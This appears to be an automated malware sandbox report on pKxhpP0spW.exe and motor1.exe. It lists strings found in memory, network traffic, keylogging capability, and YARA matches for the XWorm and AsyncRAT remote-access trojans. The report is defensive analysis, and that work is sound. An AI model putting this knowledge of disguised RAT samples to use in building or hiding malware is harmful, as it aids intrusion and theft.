Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url-serializing
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://v8.dev/blog/v8-release-89
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://webuid.movavi.com/api/v1/uid
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://webuid.movavi.com/api/v1/uid:
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/eula-general.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/eula.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/privacy.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/refund-policy.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/refund-policy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/support/).
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/privacy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/refund-policy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/refund-policy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/support/).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/privacy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/refund-policy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/refund-policy.html).
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/support).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/support/).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/tos.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/eula.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/privacy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/refund-policy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/support/).
Source: motor1.exe	String found in binary or memory: https://www.movavi.de/tos.ht
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/tos.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.qt.io.
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.qt.io/
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.qt.io/.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.youtube.com/t/terms.

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown

HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
